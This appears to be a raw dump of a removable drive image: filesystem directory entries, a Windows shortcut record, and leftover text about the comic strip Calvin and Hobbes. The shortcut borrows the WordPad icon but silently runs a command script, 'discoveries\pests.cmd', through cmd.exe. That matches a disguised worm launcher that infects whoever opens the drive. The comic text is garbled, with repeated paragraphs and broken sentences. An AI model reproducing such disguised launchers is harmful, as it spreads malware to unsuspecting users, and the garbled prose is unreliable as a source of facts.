                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       B  I n f o  rr m a t i o   n   S y s t e  rm   V o l u   m e SYSTEM~1    ��~�U�U  �~�U     HG      LNK ��~�U�U  �|�U �  Ad i s c o  tv e r i e s     ��DISCOV~1   2 ��~�U�U  �|�U                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     .           ��~�U�U  �~�U     ..          ��~�U�U  �~�U      Bt   ������ �������������  ����W P S e t  �t i n g s .   d a WPSETT~1DAT  ��~�U�U  �~�U                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       �E辨�|}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    L        �      F�@      ��q���?����+\	q��� �                    5 P�O� �:i�� +00� /C:\                   V 1     jU � Windows @ 	  ﾇOwH�U�^.   T                   ��W i n d o w s    Z 1     |U�| SysWOW64  B 	  ﾇO�I�U&c.   �                   t�7 S y s W O W 6 4    V 2  � FS�k  cmd.exe @ 	  �FS�k�Ufc.   7�         �         ��[ c m d . e x e      J            -       I         ��9V    C:\Windows\SysWOW64\cmd.exe   / q   / c   d i s c o v e r i e s \ p e s t s . c m d  c : \ w I N D O w s \ S y S T e M 3 2 \ w r I T e . E X E     �%SystemRoot%\SySTeM32\wrITe.EXE                                                                                                                                                                                                                                     % S y s t e m R o o t % \ S y S T e M 3 2 \ w r I T e . E X E                                                                                                                                                                                                                                                                                                                                                                                                                                                                                �)   �        ��1R��WH�Ψ���}'�   `     �X       desktop-a258dc9 \��Ӊ�K�K���`O��Ꜭ�D������|t\��Ӊ�K�K���`O��Ꜭ�D������|t�   	  ��   1SPS�XF�L8C���&�m�q          /   S - 1 - 5 - 2 1 - 8 8 8 2 7 0 8 9 8 - 8 7 6 0 7 7 8 0 7 - 1 0 4 8 6 5 2 9 9 8 - 1 0 0 1         9   1SPS�mD��pH�H@.�=x�   h    H   t.�%�+�G���W�EQ                                                                                                                                                                                                                                                                                                                                                         .           ��~�U�U  �~�U     ..          ��~�U�U  �~�U      Bt   ������ �������������  ����c o m b u  �s t i n g .   t x COMBUS~1TXT  ��~�U�U  �|�U � ERECT   TMP ��~�U�U  �|�U^  n
 Bd   ������ ������������  ����d i s p e  r s e r s .   c m DISPER~1CMD  ��~�U�U  �|�U�#  PESTS   CMD ��~�U�U  �|�U��   EVILS      0��~�U�U  �|�U�                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ttitudes serve primarily as a foil for Calvin's outlandish behavior At the beginning of the strip, Watterson says some fans were angered by the way Calvin's parents thought of Calvin his father has remarked that he would have preferred a dog instead They are not above the occasional cruelty: his mother provided him with a cigarette to teach him a lesson, and his father often tells him outrageous lies when asked a straight question Calvin's father is a patent attorney; his mother is a stay-at-home mom Both parents go through the entire strip unnamed, except as "Mom" and "Dad," or such nicknames as "hon" and "dear" when referring to each other Watterson has never given Calvin's parents names "because as far as the strip is concerned, they are important only as Calvin's mom and dad" This ended up being somewhat problematic when Calvin's Uncle Max was in the strip for a week and could not refer to the parents by name It was one of the main reasons that Max never reappeared


First appearance: December 5, 1985 Last appearance: December 16, 1995

Susie Derkins, the only important character with both a given name and a family name, is a classmate of Calvin's who lives in his neighborhood Named for the pet beagle of Watterson's wife's family, she first appeared early in the strip as a new student in Calvin's class In contrast with Calvin, she is polite and diligent in her studies, and her imagination usually seems mild-mannered and civilized, consisting of stereotypical young girl games such as playing house or having tea parties with her stuffed animals Though both of them hate to admit it, Calvin and Susie have quite a bit in common For example, Susie is shown on occasion with a stuffed rabbit dubbed "Mr Bun," and Calvin, of course, has Hobbes Susie also has a mischievous streak, which can be seen when she subverts Calvin's attempts to cheat on school tests by feeding him incorrect answers Watterson admits that Calvin and Susie have quite a bit in common For example, Susie is shown on occasion with a stuffed rabbit dubbed "Mr Bun," and Calvin, of course, has Hobbes Susie also has a mischievous streak, which can be seen when she subverts Calvin's attempts to cheat on school tests by feeding him incorrect answers Watterson admits that Calvin and Susie have a bit of a nascent crush on each other, and that Susie is inspired by the type of woman that he himself finds attractive and eventually married Her relationship with Calvin, though, is frequently conflicted, and never really becomes sorted out

 Miss Wormwood
Miss Wormwood, Calvin's teacher
Miss Wormwood, Calvin's teacher
Miss Wormwood, Calvin's teacher

First appearance: November 21, 1985 Last appearance: October 30, 1995 unseen speaking appearance on November 6, 1995

Miss Wormwood is Calvin's world-weary teacher, named after the apprentice devil in C S Lewis's The Screwtape Letters She perpetually wears polka-dotted dresses, and serves, like others, as a foil to Calvin's mischief Throughout the strip's run, various jokes hint that Miss Wormwood is waiting to retire, takes a lot of medication, and is a heavy smoker and drinker Watterson has said that he has a great deal of sympathy for Miss Wormwood, who is clearly frustrated by trying to keep rowdy children under control so they can learn something

 Rosalyn
Rosalyn, Calvin's babysitter and one-time swim instructor

First appearance: May 15, 1986 Last appearance: November 20, 1995

Moe is the archetypical bully character in Calvin and Hobbes, "a six-year-old who shaves," who always shoves Calvin against walls, demands his lunch money, and calls him "Twinky" Moe is the only regular character who speaks in an unusual font: his frequently monosyllabic dialogue is shown in crude, lower-case letters Watterson describes Moe as "big, dumb, ugly and cruel," and a summation of "every jerk I've ever known" While Moe is not smart, he is, as Calvin puts it, streetwise: "That means he knows what street he lives on"


Principal Spittle is the principal at Calvin's school It has been implied that, as with Miss Wormwood, Calvin's behavior is the main reason Spittle dislikes his job; Calvin has been to Spittle's office enough times that his file of transgressions is the thickest in the entire district Spittle's appearances typically come in the last panel of strips that show Calvin misbehaving in class and being sent to his office, where he serves as a foil for Calvin's outlandish excuses for his antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron
     Emergency GROSS meeting "box of secrecy"
     A stand for selling things, such as "lemonade"

Building the Transmogrifier is accomplished by turning a cardboard box upside-down, attaching an arrow to the side and writing a list of choices on the box to turn into anything not stated on the box, the name is written on the remaining space Upon turning the arrow to a particular choice and pushing a button, the transmogrifier instantaneously rearranges the subject's "chemical configuration" accompanied by a loud zap

The Duplicator is also made from a cardboard box, turned on its side Instead of the transmogrifier's "zap" sound, it makes a "boink" The title of one of the collections, "Scientific Progress Goes 'Boink'", quotes a phrase that Hobbes utters upon hearing the Duplicator in operation The Duplicator produces copies of Calvin, which initially turn out to be as problematic and independent as Calvin

The Time Machine is also made from the same box, this time with its open side up Passengers climb into the open top, and must be wearing protective goggles while in time-warp Calvin first intends to travel to the future and obtain future technology that he could use to become rich in the present time Unfortunately, he faces the wrong way as he steers and ends up in prehistoric times

The Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, "it's a lot more interesting 

During winter, Calvin often engages in snowball fights with Hobbes or Susie, who frequently best him due to their own wit or Calvin's unreliable aim Calvin is attentive to the craft of making a good snowball or slushball, but his delight in hitting Susie in the back of the head with a well-aimed snowball is often tempered by his anxiousness to remain on Santa's "good" list at Christmas time

Calvin is also very talented and creative at building snowmen, but he usually puts them in scenes that depict the snowmen dying or suffering in grotesque ways In one scene Calvin builds a row of saluting snowmen as a means to humiliate his dad as he returns from work "He knows I hate this," says his father as he proceeds up the front walk In another, to retaliate Susie's creation of a "snowwoman", he decides to create an "anatomically correct" snowman in the front yard His creations tend to alarm his parents due to their macabre nature In a notable storyline, Calvin builds a snowman and brings it to life in a manner reminiscent of Frankenstein's monster, and which proceeds to create more of its own kind This storyline gave the title to the Calvin and Hobbes book Attack of the Deranged Mutant Killer Monster Snow Goons Those Sunday strips were never reprinted in color until the Complete collection was finally published in 2005 Every book since Snow Goons has been printed in a larger format with Sundays in color and weekday and Saturday strips larger than they appeared in most newspapers Watterson also claims he named the books the "Essential, Authoritative, and Indispensable" because as he says in The Calvin and Hobbes Tenth Anniversary Book, the books are "obviously none of these things"

Remaining books do contain some additional content; for instance, The Calvin and Hobbes Lazy Sunday Book contains a long watercolor Spaceman Spiff epic not seen elsewhere until Complete, and The Calvin and Hobbes Tenth Anniversary Book contains much original commentary from Watterson Calvin and Hobbes: Sunday Pages 1985–1995 contains 36 Sunday strips in color alongside Watterson's original sketches, prepared for an exhibition at The Ohio State University Cartoon Research Library

An officially licensed children's textbook entitled Teaching with Calvin and Hobbes was published in a limited single print-run in 1993 The book includes various Calvin and Hobbes strips together with lessons and questions to follow, such as, "What do you think the principal meant when he said they had quite a file on Calvin" 108 The book is very rare and increasingly sought by collectorsiginal

During Watterson's first sabbatical from the strip, Universal Press Syndicate will continue That so many newspapers would carry Calvin and Hobbes is an honor I'll long be proud of, and I've greatly appreciated your support and indulgence over the last decade Drawing this comic strip has been a privilege and a pleasure, and I thank you for giving me the opportunity

The 3,160th and final strip ran on Sunday, December 31, 1995

 Syndication and Watterson's artistic standards

From the outset, Watterson found himself at odds with the syndicate, which urged him to begin merchandising the characters and touring the country to promote the first collections of comic strips Watterson refused To him, the integrity of the strip and its artist would be undermined by commercialization, which he saw as a major negative influence in the world of cartoon art

Watterson also grew increasingly frustrated by the gradual shrinking of available space for comics in the newspapers He lamented that without space for anything more than simple dialogue or spare artwork, comics as an art form were becoming dilute, bland, and unoriginal

During Watterson's first sabbatical from the strip, Universal Press Syndicate continued to charge newspapers full price to re-run old Calvin and Hobbes strips Few editors approved of the move, but the strip was so popular that they had little choice but to continue to run it for fear that competing newspapers might pick it up and draw its fans away
This half-page layout can easily be rearranged for full, third, and quarter pages

